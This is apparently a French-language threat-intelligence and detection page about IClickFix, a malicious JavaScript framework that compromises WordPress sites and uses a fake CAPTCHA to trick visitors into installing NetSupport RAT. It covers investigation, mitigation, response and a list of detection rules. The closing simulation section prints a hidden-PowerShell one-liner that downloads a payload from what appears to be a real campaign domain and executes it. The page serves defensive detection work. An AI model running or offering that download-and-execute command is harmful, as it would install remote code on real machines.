Rencontrez IClickFix : un cadre répandu ciblant WordPress utilisant la tactique ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport présente IClickFix, un cadre JavaScript malveillant qui compromet les sites WordPress et présente un CAPTCHA falsifié de type Cloudflare Turnstile. L’appât contraint les visiteurs à exécuter une commande PowerShell qui télécharge et installe NetSupport RAT. La diffusion est soutenue par un système de distribution de trafic construit autour de l’outil YOURLS et un ensemble rotatif de domaines de redirection. Les chercheurs ont observé plus de 3,800 sites WordPress compromis servant cette chaîne à l’échelle mondiale depuis fin 2024.
Enquête
Les analystes de Sekoia ont identifié la balise JavaScript injectée ic-tracker-js sur des sites compromis, puis ont reconstruit le flux de redirection à travers plusieurs domaines à courte durée de vie. Ils ont capturé le modèle exact d’exécution PowerShell utilisé pour récupérer la charge utile finale et ont récupéré les composants NetSupport RAT abandonnés ainsi que les indicateurs d’infrastructure associée pour le commandement et contrôle.
Atténuation
Surveiller le contenu web pour l’ ic-tracker-js injection et bloquer les domaines malveillants connus, les redirections et les services de lien court utilisés dans la chaîne. Sur les points d’extrémité, détecter les schémas de téléchargement et d’exécution PowerShell compatibles avec le leur ClickFix. Ajouter une couverture pour la création de fichiers client NetSupport et pour la persistance via des Run clés de registre au niveau utilisateur.
Réponse
Lorsque des indicateurs apparaissent, isoler le point d’extrémité, arrêter le processus PowerShell actif, et supprimer les binaires NetSupport ainsi que toute persistance basée sur le registre. Suivre avec un triage médico-légal complet pour confirmer que l’attaquant n’a pas déployé d’implants supplémentaires ou établi des chemins d’accès secondaires.
Flux d’Attaque
Detections
Download or Upload via Powershell (via cmdline)
View
Suspicious Files in Public User Profile (via file_event)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Suspicious Usage of Invoke-RestMethod (via powershell)
View
Possible NetSupport Manager Binary Executing From Suspicious Directory Attempt (via process_creation)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
IOCs (HashSha256) to detect: Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic
View
IOCs (DestinationIP) to detect: Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic
View
IOCs (SourceIP) to detect: Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic
View
IClickFix Malicious JavaScript Injection Detection [Webserver]
View
PowerShell Command Execution for NetSupport RAT Delivery [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
An adversary who has initial access to the endpoint wishes to establish a persistent foothold by delivering the NetSupport RAT. To evade interactive detection, they launch PowerShell in hidden mode with no profile or logo (
-w hidden -nop -c). They then useInvoke‑WebRequest(iwr) to download a malicious JSON payload (tytuy.json) that contains a PowerShell script for the RAT. The script is written to the temporary directory and executed viaInvoke‑Expression. This exact command line matches the strings the Sigma rule monitors. -
Regression Test Script:
# PowerShell one‑liner that matches the detection rule $url = 'https://scottvmorton.com/tytuy.json' $out = "$env:TEMPpayload.ps1" powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)" -
Cleanup Commands:
# Remove the downloaded payload and any lingering PowerShell processes Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force